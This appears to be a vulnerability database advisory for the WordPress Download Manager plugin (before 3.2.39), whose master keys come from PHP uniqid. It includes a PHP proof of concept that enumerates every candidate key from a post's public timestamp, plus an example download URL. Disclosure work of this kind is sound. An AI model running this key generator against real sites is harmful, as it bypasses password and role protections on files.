WordPress Plugin Vulnerabilities
Download Manager < 3.2.39 - Unauthenticated brute force of files master key
Description
The plugin uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download.
Proof of Concept
<?php // The full timestamp from the post containing the download (available to unauthenticated user.) $wordpress_data = "2022-02-03T18:50:35+00:00"; $requestTimestamp = strtotime($wordpress_data); function uniqidGen($timestamp) { return sprintf("%8x%05x",floor($timestamp),($timestamp-floor($timestamp))*1000000); } // Generate all possible master keys for the given timestamp (max 1 million keys) for ($i = 0; $i <= 999999; $i++) { echo uniqidGen($requestTimestamp . "." . $i), PHP_EOL; } // The dowload link would be something like this: // https://example.com/download/test-download/?wpdmdl=5&_wpdmkey=6203ab5c2a704
Affects Plugins
References
CVE
Classification
Type
INSUFFICIENT CRYPTOGRAPHY
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Diogo Real
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-16 (about 2 years ago)
Added
2022-03-16 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)